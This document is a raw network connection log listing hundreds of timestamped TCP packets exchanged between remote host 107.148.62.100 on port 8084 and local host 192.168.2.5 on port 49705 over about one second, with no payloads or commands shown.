Dec 18, 2024 13:32:00.096640110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.096690893 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.097325087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.097820044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.097882986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.099128962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.099370003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.099431992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.099941969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.101480007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.101531029 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.101834059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.102339983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.102408886 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.104500055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.104720116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.104780912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.105133057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.106751919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.106812000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.107070923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.107526064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.107585907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.109690905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.109772921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.109827042 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.110424995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.111990929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.112044096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.112246990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.112803936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.112858057 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.115583897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.115875959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.115933895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.116348982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.118011951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.118061066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.118313074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.118833065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.118891001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.119565010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.119894028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.119951010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.120800018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.121000051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.121059895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.121675968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.123128891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.123177052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.123519897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.124124050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.124175072 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.207825899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.208070040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.208187103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.208343983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.216332912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.216422081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.216744900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.217411041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.217466116 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.376143932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376157045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376167059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376173019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376183987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376194954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376204967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376218081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376230001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376243114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.376266956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.376321077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377024889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377036095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377047062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377058029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377069950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377075911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377085924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377090931 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377098083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377110004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377121925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377135038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377137899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377146006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377157927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377168894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377172947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377182007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377196074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377206087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377207994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377218008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377228975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377228975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377242088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377253056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377254009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377266884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377276897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377279043 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377289057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377300978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377311945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377322912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377336025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377346039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377350092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377356052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377367020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377372980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377379894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377383947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377393961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377407074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377412081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377435923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377465963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377502918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377513885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377526045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.377545118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.377578974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.423388004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.423404932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.423505068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.424561977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.430012941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.430073977 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.430450916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.431297064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.431350946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.449317932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.451172113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.451185942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.451226950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.452686071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.452728987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.454236984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.455846071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.455904961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.478101969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.479603052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.479617119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.479695082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.523957968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.524058104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.524111986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.524813890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.524872065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.525039911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.525734901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.525784016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.526377916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.527257919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.527307987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.527735949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.529697895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.529753923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.537064075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.537081003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.537157059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.538685083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.541681051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.541698933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.541714907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.541742086 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.541785002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.546133995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.546159983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.546175003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.546205044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.547734976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.547786951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.547815084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.547831059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.547883987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.549295902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.549312115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.549328089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.549371004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.550766945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.550782919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.550797939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.550828934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.550858974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.552376032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.552392006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.552445889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.553735971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.553752899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.553767920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.553808928 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.555277109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.555294037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.555308104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.555339098 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.555354118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.556772947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.556859970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.556910038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.558367014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.558383942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.558443069 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.635019064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.635375023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.635437012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.637458086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.652410030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.652463913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.653884888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.653902054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.653964996 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.684173107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.684201956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.684216976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.684355021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.685740948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.685758114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.685771942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.685791016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.685827017 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.687211037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.687227964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.687242031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.687304020 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.737818003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.738070965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.738137007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.738718987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.739106894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.739156961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.739736080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.740315914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.740361929 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.741225004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.741647005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.741697073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.742276907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.745759964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.745817900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.745992899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.746577024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.746632099 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.746967077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.748001099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.748056889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.748857975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.749609947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.749665022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.749877930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.750492096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.750539064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.752250910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.752702951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.752752066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.753539085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.754925966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.754978895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.755300999 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.755942106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.755996943 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.757484913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.757715940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.757764101 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.758589029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.760135889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.760185003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.760502100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.761096001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.761142969 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.762501001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.763219118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.763267994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.763917923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.765747070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.765796900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.766133070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.766746998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.766798973 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.768064976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.768613100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.768661022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.769201994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.812203884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.866849899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.866868019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.866883039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.866961002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.874465942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.874483109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.874499083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.874538898 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.874569893 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.875755072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.875771999 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.875834942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.877171040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.877187014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.877234936 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.878570080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.878587008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.878804922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.888942003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.889255047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.889336109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.889941931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.939987898 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.951805115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.952011108 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.952081919 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.952702045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.953035116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.953090906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.953756094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.953767061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.953813076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.954549074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.955554962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.955626965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.955872059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.956510067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.956566095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.960000992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.960306883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.960391998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.960544109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.960932016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.960990906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.961158991 CET	8084	49705	107.148.62.100	192.168.2.5
